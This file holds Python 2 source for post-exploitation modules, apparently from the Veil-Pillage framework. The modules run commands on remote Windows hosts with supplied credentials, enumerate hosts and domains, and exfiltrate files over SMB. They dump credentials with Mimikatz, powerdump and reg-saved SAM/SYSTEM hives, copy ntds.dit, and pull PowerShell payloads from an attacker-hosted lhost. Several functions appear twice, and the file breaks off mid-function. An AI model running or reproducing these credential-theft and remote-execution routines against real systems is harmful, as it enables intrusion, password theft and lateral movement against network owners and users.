def run(self):
    """
    Download one file from every target over SMB and keep a local copy.

    Uses the single credential pair in self.creds[0]. The remote path comes
    from required_options["fileName"]; required_options["delete"] is a string
    and only a case-insensitive "true" removes the remote file afterwards.
    One status line per target is appended to self.output. Returns nothing.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    fileName = self.required_options["fileName"][0]
    deleteFile = self.required_options["delete"][0]
    for target in self.targets:
        # Python 2 print statement (this module predates Python 3)
        print "\n [*] downloading '"+fileName+"' from "+target
        # check if the user wants to delete the file after download
        if deleteFile.lower() == "true":
            out = smb.getFile(target, username, password, fileName, delete=True)
        else:
            out = smb.getFile(target, username, password, fileName, delete=False)
        # an empty string is the only failure signal smb.getFile gives us here
        if out == "":
            # NOTE(review): the password is copied verbatim into self.output, so the
            # module's result files carry cleartext credentials; consider redacting.
            self.output += "[!] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' empty or doesn't exist\n"
            # TODO: keep this "" or change to None if nothing is returned?
        else:
            # write the module out to the appropriate output location; the local
            # name is the last component of the remote path (split on backslash)
            saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out)
            self.output += "[*] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' saved to "+saveName+"\n"
def run(self):
    """
    Run a fixed batch of host-enumeration commands on each target and fetch the output.

    Uses the single credential pair in self.creds[0]. "trigger_method" selects
    how command_methods.executeCommand launches the command; "out_file" names
    the remote file every command appends to (prefixed with the Windows temp
    directory when it contains no backslash). After a fixed 20-second wait the
    file is fetched and deleted, and one status line per target is appended to
    self.output. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    outFile = self.required_options["out_file"][0]
    if "\\" not in outFile:
        # otherwise assume it's an absolute path
        outFile = "C:\\Windows\\Temp\\" + outFile
    for target in self.targets:
        # NOTE(review): unused local, never read
        targetUsernames = []
        # every command appends to the same remote file; outFile is interpolated
        # unquoted, so an out_file option containing spaces would break the command line
        command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" % {"p": outFile}
        # execute the command
        # NOTE(review): result is stored but never checked; a failed trigger is only
        # noticed 20 seconds later as an empty result file
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)
        # wait 20 seconds for "systeminfo" to run (fixed delay, not configurable)
        print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
        time.sleep(20)
        # grab the output file and delete it
        out = smb.getFile(target, username, password, outFile, delete=True)
        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out)
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
    """
    Retrieve the netview.exe result file from each target and store it locally.

    Uses the single credential pair in self.creds[0]. "out_file" is the remote
    result path (prefixed with the Windows temp directory when it contains no
    backslash); it is fetched and deleted, the remote netview.exe binary is
    deleted as well, and a status line per target is appended to self.output.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    out_file = self.required_options["out_file"][0]
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file
    for target in self.targets:
        # grab the output file and delete it
        out = smb.getFile(target, username, password, out_file, delete=True)
        # delete the netview.exe binary
        smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe")
        # save the file off to the appropriate location
        # NOTE(review): called unconditionally, so an empty netview.txt is written
        # when out == ""; the other modules only save inside the success branch
        saveFile = helpers.saveModuleFile(self, target, "netview.txt", out)
        if out != "":
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] netview.exe results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] netview.exe execution failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
    """
    Retrieve the netview.exe result file from each target and store it locally.

    Uses the single credential pair in self.creds[0]. "out_file" is the remote
    result path (prefixed with the Windows temp directory when it contains no
    backslash); it is fetched and deleted, the remote netview.exe binary is
    deleted as well, and a status line per target is appended to self.output.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    out_file = self.required_options["out_file"][0]
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file
    for target in self.targets:
        # grab the output file and delete it
        out = smb.getFile(target, username, password, out_file, delete=True)
        # delete the netview.exe binary
        smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe")
        # save the file off to the appropriate location
        # NOTE(review): called unconditionally, so an empty netview.txt is written
        # when out == ""; the other modules only save inside the success branch
        saveFile = helpers.saveModuleFile(self, target, "netview.txt", out)
        if out != "":
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] netview.exe results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] netview.exe execution failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def winexeExecuteResult(target, username, password, cmd, pause=1): """ Run a particular command with winexeCommand(), get the result with getFile() and delete the temporary output file. 'pause' is the number of seconds between execution of the command and the grabbing of the temporary file, defaults to 1 second Returns the result of the command on success, and "failure" on failure. """ # choose a random output file outputFile = helpers.randomString() + ".txt" # execute the wmisCommand and specify the output file to be our randomized name output = winexeCommand(target, username, password, cmd, outputFile=outputFile) # check if the command was successful if output == "success": # sleep for a bit of time before we grab the output file time.sleep(pause) # retrieve the output file and delete it return smb.getFile(target, username, password, "C:\\Windows\\Temp\\"+outputFile, delete=True) return output
def winexeExecuteResult(target, username, password, cmd, pause=1): """ Run a particular command with winexeCommand(), get the result with getFile() and delete the temporary output file. 'pause' is the number of seconds between execution of the command and the grabbing of the temporary file, defaults to 1 second Returns the result of the command on success, and "failure" on failure. """ # choose a random output file outputFile = helpers.randomString() + ".txt" # execute the wmisCommand and specify the output file to be our randomized name output = winexeCommand(target, username, password, cmd, outputFile=outputFile) # check if the command was successful if output == "success": # sleep for a bit of time before we grab the output file time.sleep(pause) # retrieve the output file and delete it return smb.getFile(target, username, password, "C:\\Windows\\Temp\\" + outputFile, delete=True) return output
def run(self):
    """
    Stage the PowerSploit Invoke-Mimikatz script on all targets and collect its output.

    Uses the single credential pair in self.creds[0]. Options: "use_ssl" and
    "lhost" configure the hosting side, "trigger_method" how the download
    cradle is launched, "delay" (a string, converted with int()) how long to
    wait before fetching, and "out_file" the remote output path (prefixed
    with the Windows temp directory when it contains no backslash). One
    status line per target is appended to self.output. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    use_ssl = self.required_options["use_ssl"][0]
    lhost = self.required_options["lhost"][0]
    triggerMethod = self.required_options["trigger_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]
    # the temporary output file the script's output is redirected to
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file
    # path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
    secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-Mimikatz.ps1"
    # Mimikatz command to run
    scriptArguments = "Invoke-Mimikatz -Dumpcreds"
    # trigger the powershell download on all targets at once (one call, not per target)
    # noArch=True: per the original comment this skips the architecture-specific
    # cradle selection — confirm against delivery_methods.powershellHostTrigger
    delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True)
    # delay is still a string here (string concatenation), int() below raises
    # ValueError on a non-numeric option value
    print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
    time.sleep(int(delay))
    for target in self.targets:
        # grab the output file and delete it
        out = smb.getFile(target, username, password, out_file, delete=True)
        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
    """
    Download one file from every target over SMB and keep a local copy.

    Uses the single credential pair in self.creds[0]. The remote path comes
    from required_options["fileName"]; required_options["delete"] is a string
    and only a case-insensitive "true" removes the remote file afterwards.
    One status line per target is appended to self.output. Returns nothing.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    fileName = self.required_options["fileName"][0]
    deleteFile = self.required_options["delete"][0]
    for target in self.targets:
        # Python 2 print statement (this module predates Python 3)
        print "\n [*] downloading '" + fileName + "' from " + target
        # check if the user wants to delete the file after download
        if deleteFile.lower() == "true":
            out = smb.getFile(target, username, password, fileName, delete=True)
        else:
            out = smb.getFile(target, username, password, fileName, delete=False)
        # an empty string is the only failure signal smb.getFile gives us here
        if out == "":
            # NOTE(review): the password is copied verbatim into self.output, so the
            # module's result files carry cleartext credentials; consider redacting.
            self.output += "[!] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' empty or doesn't exist\n"
            # TODO: keep this "" or change to None if nothing is returned?
        else:
            # write the module out to the appropriate output location; the local
            # name is the last component of the remote path (split on backslash)
            saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out)
            self.output += "[*] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' saved to " + saveName + "\n"
def run(self):
    """
    Stage the PowerSploit Invoke-NinjaCopy script on all targets and fetch the copied file.

    Uses the single credential pair in self.creds[0]. Options: "use_ssl" and
    "lhost" for the hosting side, "trigger_method" for how the cradle is
    launched, and "host_file" for the remote file to copy; the literal value
    "ntdis.dit" is expanded to the full ntds.dit path, anything else is used
    as given. After a fixed 30-second wait the copy (left in the Windows temp
    directory) is fetched from each target and saved locally; status lines
    are appended to self.output. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    use_ssl = self.required_options["use_ssl"][0]
    lhost = self.required_options["lhost"][0]
    triggerMethod = self.required_options["trigger_method"][0]
    host_file = self.required_options["host_file"][0]
    # the protected file on the host to copy; only this exact shorthand is expanded
    if host_file == "ntdis.dit":
        host_file = "C:\\Windows\\ntds\\ntds.dit"
    # Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit"
    # local file to copy into: same base name, under the Windows temp directory
    localFile = "C:\\Windows\\Temp\\"+host_file.split("\\")[-1]
    # path to the PowerSploit Invoke-NinjaCopy.ps1 powershell script
    secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-NinjaCopy.ps1"
    # pass the arguments to invoke ninja-copy
    # NOTE(review): host_file is quoted but localFile is not; a temp path with
    # spaces would be split by PowerShell
    scriptArguments = "Invoke-NinjaCopy -Path \""+host_file+"\" -LocalDestination "+localFile
    # trigger the powershell download on all targets (one call, not per target)
    delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, ssl=use_ssl)
    for target in self.targets:
        # NOTE(review): username:password lands in self.output in cleartext
        self.output += "[*] Powersploit:Invoke-NinjaCopy triggered using creds '"+username+":"+password+"' on "+target+"\n"
    # fixed wait, unlike the sibling modules that read a "delay" option
    print "\n [*] Waiting 30s for NinjaCopy to run..."
    time.sleep(30)
    for target in self.targets:
        # grab the output file; delete=False, so the copy stays on the target
        out = smb.getFile(target, username, password, localFile, delete=False)
        # save the file off to the appropriate location
        # NOTE(review): called unconditionally, so an empty local file is written
        # when out == ""
        saveFile = helpers.saveModuleFile(self, target, host_file.split("\\")[-1], out)
        if out != "":
            self.output += "[*] Powersploit:Invoke-NinjaCopy results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] Powersploit:Invoke-NinjaCopy failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
    """
    Stage the powerdump.ps1 script on all targets, collect and merge its output.

    Uses the single credential pair in self.creds[0]. Options: "use_ssl" and
    "lhost" for the hosting side, "trigger_method" for how the cradle is
    launched, and "delay" (a string, converted with int()) for how long to
    wait before fetching the fixed remote output file. Per-target results are
    parsed with helpers.parseHashdump and a sorted, de-duplicated summary of
    all targets is appended to self.output. Returns nothing.
    """
    # accumulates parsed lines from every target
    allHashes = []
    # assume single set of credentials for this module
    username, password = self.creds[0]
    use_ssl = self.required_options["use_ssl"][0]
    lhost = self.required_options["lhost"][0]
    triggerMethod = self.required_options["trigger_method"][0]
    delay = self.required_options["delay"][0]
    # the temporary output file powerdump will write to (fixed, not an option here)
    outFile = "C:\\Windows\\Temp\\sys32.out"
    # path to the powerdump.ps1 powershell script
    secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/misc/powerdump.ps1"
    # execute the host/trigger command with all the targets (one call)
    delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, triggerMethod=triggerMethod, outFile=outFile, ssl=use_ssl)
    # delay is a string here; int() below raises ValueError on a non-numeric value
    print "\n [*] Waiting "+delay+"s for powerdump to run..."
    time.sleep(int(delay))
    for target in self.targets:
        # grab the output file and delete it
        out = smb.getFile(target, username, password, outFile, delete=True)
        if out != "":
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] powerdump results using creds '"+username+":"+password+"' on "+target+" :\n"
            # self.output += out + "\n"
            # parse the powerdump output
            hashes = helpers.parseHashdump(out)
            allHashes.extend(hashes)
            # NOTE(review): this joins the cumulative allHashes, not this target's
            # hashes, so every target's section repeats earlier targets' lines;
            # it also ends without "\n", so the next status line is glued on
            self.output += "\n".join(allHashes)
        else:
            self.output += "[!] powerdump failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
    # cross-target summary, de-duplicated and sorted
    if len(allHashes) > 0:
        allHashes = sorted(set(allHashes))
        self.output += "\n[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"
def run(self):
    """
    Run a fixed batch of domain-enumeration "net" commands on each target and fetch the output.

    Uses the single credential pair in self.creds[0]. "out_file" names the
    remote file every command appends to (prefixed with the Windows temp
    directory when it contains no backslash). The trigger method is pinned
    to "winexe" (see comment). After a fixed 20-second wait the file is
    fetched and deleted, and one status line per target is appended to
    self.output. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    outFile = self.required_options["out_file"][0]
    # wmis doesn't like net * /domain commands >_<
    triggerMethod = "winexe"
    if "\\" not in outFile:
        # otherwise assume it's an absolute path
        outFile = "C:\\Windows\\Temp\\" + outFile
    for target in self.targets:
        # NOTE(review): unused local, never read
        targetUsernames = []
        # every command appends to the same remote file; outFile is interpolated
        # unquoted, so an out_file option containing spaces would break the command line
        command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % { "p": outFile }
        # execute the command
        # NOTE(review): result is stored but never checked; a failed trigger is only
        # noticed 20 seconds later as an empty result file
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)
        # wait 20 seconds for commands to run (fixed delay, not configurable)
        print helpers.color( "\n [*] Waiting 20 seconds for enumeration commands to run on '" + target + "'", status=True)
        time.sleep(20)
        # grab the output file and delete it
        out = smb.getFile(target, username, password, outFile, delete=True)
        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
    """
    Enumerate the current user's "Recent" folders on each target and save every .lnk file found.

    Uses the single credential pair in self.creds[0] and "trigger_method"
    for command_methods.executeResult. The user profile directory is read
    from %USERPROFILE%, four well-known Recent folders under it are listed
    with smb.ls, each .lnk file is downloaded with helpers.saveModuleFile
    and parsed with pylnker.parse_lnk into a "<name>_details" file. Status
    lines are appended to self.output. Returns nothing.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    trigger_method = self.required_options["trigger_method"][0]
    for target in self.targets:
        command = "echo %USERPROFILE%"
        user_profile = command_methods.executeResult(target, username, password, command, trigger_method)
        if user_profile == '':
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n"
        else:
            # drop the trailing CRLF the echo leaves behind
            user_profile = user_profile.strip(" \r\n")
            # XP-style and Vista+ locations for Explorer's and Office's Recent folders
            recent_path1 = user_profile + "\\Recent"
            recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent"
            office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent"
            office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent"
            self.output += " [*] Enumerating recent files on %s \n" % target
            for path in [recent_path1, recent_path2, office_path1, office_path2]:
                # path_error=False: presumably suppresses the error for a missing folder — confirm in smb.ls
                files = smb.ls(target, username, password, path, path_error=False)
                if len(files) > 0:
                    self.output += " [*] Found %s files \n" % len(files)
                    # NOTE(review): "file" shadows the Python 2 builtin
                    for file in files:
                        # plain case-sensitive suffix compare: "foo.lnk" and "xlnk" both match, "FOO.LNK" does not
                        if file[-3:] == "lnk":
                            out = smb.getFile(target, username, password, path + "\\" + file, delete=False)
                            if out == '':
                                self.output += " [!] Failed retrieving : %s \n" % file
                            else:
                                save_path = helpers.saveModuleFile(self, target, file, out)
                                self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path)
                                try:
                                    # parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252')
                                    parsed_lnk = pylnker.parse_lnk(save_path)
                                    details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk)
                                    self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path)
                                # NOTE(review): bare except also swallows KeyboardInterrupt and
                                # SystemExit; narrow to "except Exception:" and record the error
                                except:
                                    self.output += " [!] Error while parsing : %s \n" % save_path
def smbexecExecuteResult(target, username, password, cmd, pause=1): """ Calls a modified version of Impacket's smbexec.py example and returns the output of the command passed. code hosted in ./lib/smb.py Creates a service but doesn't drop any binary to disk. """ # choose a random output file outputFile = helpers.randomString() + ".txt" # run the command smbexecCommand(target, username, password, cmd, outputFile=outputFile) # sleep for a bit of time before we grab the output file time.sleep(pause) # return the output return smb.getFile(target, username, password, "C:\\Windows\\Temp\\"+outputFile, delete=True)
def run(self):
    """
    Stage the PowerSploit Invoke-Mimikatz script on all targets and collect its output.

    Uses the single credential pair in self.creds[0]. Options: "use_ssl" and
    "lhost" configure the hosting side, "trigger_method" how the download
    cradle is launched, "delay" (a string, converted with int()) how long to
    wait before fetching, and "out_file" the remote output path (prefixed
    with the Windows temp directory when it contains no backslash). One
    status line per target is appended to self.output. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    use_ssl = self.required_options["use_ssl"][0]
    lhost = self.required_options["lhost"][0]
    triggerMethod = self.required_options["trigger_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]
    # the temporary output file the script's output is redirected to
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file
    # path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
    secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-Mimikatz.ps1"
    # Mimikatz command to run
    scriptArguments = "Invoke-Mimikatz -Dumpcreds"
    # trigger the powershell download on all targets at once (one call, not per target)
    # noArch=True: per the original comment this skips the architecture-specific
    # cradle selection — confirm against delivery_methods.powershellHostTrigger
    delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True)
    # delay is still a string here (string concatenation), int() below raises
    # ValueError on a non-numeric option value
    print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
    time.sleep(int(delay))
    for target in self.targets:
        # grab the output file and delete it
        out = smb.getFile(target, username, password, out_file, delete=True)
        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
    """
    Run a fixed batch of domain-enumeration "net" commands on each target and fetch the output.

    Uses the single credential pair in self.creds[0]. "out_file" names the
    remote file every command appends to (prefixed with the Windows temp
    directory when it contains no backslash). The trigger method is pinned
    to "winexe" (see comment). After a fixed 20-second wait the file is
    fetched and deleted, and one status line per target is appended to
    self.output. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    outFile = self.required_options["out_file"][0]
    # wmis doesn't like net * /domain commands >_<
    triggerMethod = "winexe"
    if "\\" not in outFile:
        # otherwise assume it's an absolute path
        outFile = "C:\\Windows\\Temp\\" + outFile
    for target in self.targets:
        # NOTE(review): unused local, never read
        targetUsernames = []
        # every command appends to the same remote file; outFile is interpolated
        # unquoted, so an out_file option containing spaces would break the command line
        command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % {"p": outFile}
        # execute the command
        # NOTE(review): result is stored but never checked; a failed trigger is only
        # noticed 20 seconds later as an empty result file
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)
        # wait 20 seconds for commands to run (fixed delay, not configurable)
        print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
        time.sleep(20)
        # grab the output file and delete it
        out = smb.getFile(target, username, password, outFile, delete=True)
        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
            # NOTE(review): username:password lands in self.output in cleartext
            self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def smbexecExecuteResult(target, username, password, cmd, pause=1): """ Calls a modified version of Impacket's smbexec.py example and returns the output of the command passed. code hosted in ./lib/smb.py Creates a service but doesn't drop any binary to disk. """ # choose a random output file outputFile = helpers.randomString() + ".txt" # run the command smbexecCommand(target, username, password, cmd, outputFile=outputFile) # sleep for a bit of time before we grab the output file time.sleep(pause) # return the output return smb.getFile(target, username, password, "C:\\Windows\\Temp\\" + outputFile, delete=True)
def run(self):
    """
    Collect credential material from each target, choosing a PowerShell or a binary path per host.

    Uses the single credential pair in self.creds[0]. Options: "lhost" and
    "use_ssl" for the hosting side, "force_method" ("binary", "powershell",
    or anything else to probe for a working PowerShell), "delay" (a string,
    converted with int()) and "out_file" (prefixed with the Windows temp
    directory when it contains no backslash).

    PowerShell path: stages data/misc/autograb.ps1 via powershellHostTrigger,
    fetches out_file and parses it with helpers.parseMimikatz and
    helpers.parseHashdump. Binary path: saves the SYSTEM/SECURITY/SAM hives
    with reg.exe, copies them to fixed /tmp paths on this host, runs
    creddump.dump_file_hashes on them, then hosts the architecture-matching
    mimikatz binary via hostTrigger and parses its output.

    Per-target status lines and a sorted, de-duplicated cross-target summary
    of every list are appended to self.output. Returns nothing.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    lhost = self.required_options["lhost"][0]
    use_ssl = self.required_options["use_ssl"][0]
    force_method = self.required_options["force_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]
    # let's keep track of all credentials found (accumulated across targets)
    allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
    for target in self.targets:
        powershellInstalled = False
        # check if we're forcing a particular grab method
        if force_method.lower() == "binary":
            powershellInstalled = False
        elif force_method.lower() == "powershell":
            powershellInstalled = True
        else:
            # check if we have a functional Powershell installation by echoing a constant
            powershellCommand = "powershell.exe -c \"$a=42;$a\""
            powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
            if powershellResult.strip() == "42":
                powershellInstalled = True
        if powershellInstalled:
            # do powersploit combined file of invoke-mimikatz and powerdump
            print helpers.color("\n [*] Powershell installed on " + target)
            self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
            # the temporary output file we will write to; once prefixed it contains a
            # backslash, so later iterations don't prefix it again
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            # path to the combined Invoke-Mimikatz/powerdump powershell script
            secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
            # trigger the powershell download on just this target (trigger method pinned to winexe)
            delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True)
            # delay is a string here; int() below raises ValueError on a non-numeric value
            print "\n [*] Waiting " + delay + "s for Autograb to run..."
            time.sleep(int(delay))
            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)
            # save the file off to the appropriate location
            # NOTE(review): saved and parsed before the out != "" check, so an empty
            # autograb.txt is written on failure
            saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # parse the powerdump component
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            if out != "":
                # NOTE(review): username:password lands in self.output in cleartext
                self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
        else:
            # do reg.exe for hashdump and host/execute for mimikatz
            print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
            print helpers.color( "\n [*] Using reg.exe save method for hash dumping on " + target)
            self.output += "[!] Powershell not installed on " + target + "\n"
            # reg.exe command to save off the hives
            regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
            # execute the registry save command
            command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
            print helpers.color("\n [*] Dumping hashes on " + target)
            # sleep for 5 seconds to let everything backup (fixed wait)
            time.sleep(5)
            # grab all of the backed up files; delete=False, so the hive copies stay on the target
            systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
            securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
            samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
            # more error-checking here?
            # NOTE(review): these messages interpolate the (empty) file CONTENTS
            # where a file name was intended, so they always print "File ''"
            # NOTE(review): the hive copies go to fixed, predictable paths in the
            # shared /tmp directory and are never removed; on a multi-user host that
            # is a symlink / pre-creation risk and leaves credential material behind —
            # tempfile.mkdtemp() plus cleanup would avoid both
            if systemFile == "":
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/system', 'w')
                f.write(systemFile)
                f.close()
            if securityFile == "":
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/security', 'w')
                f.write(securityFile)
                f.close()
            if samFile == "":
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/sam', 'w')
                f.write(samFile)
                f.close()
            # get all the hashes from these hives
            # NOTE(review): runs even when a fetch above failed, so a stale /tmp copy
            # from an earlier target/run can be attributed to this target; the
            # hashdump module guards this with an "error" flag — do the same here
            out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
            # save the output file off
            saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
            self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
            # save these off to the universal list
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            # now, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult( target, username, password, archCommand, "wmis")
            # anything without "64" in it (including an empty result) is treated as x86
            arch = "x86"
            if "64" in archResult:
                arch = "x64"
            # now time for ze mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
            # the temporary output file we will write to
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
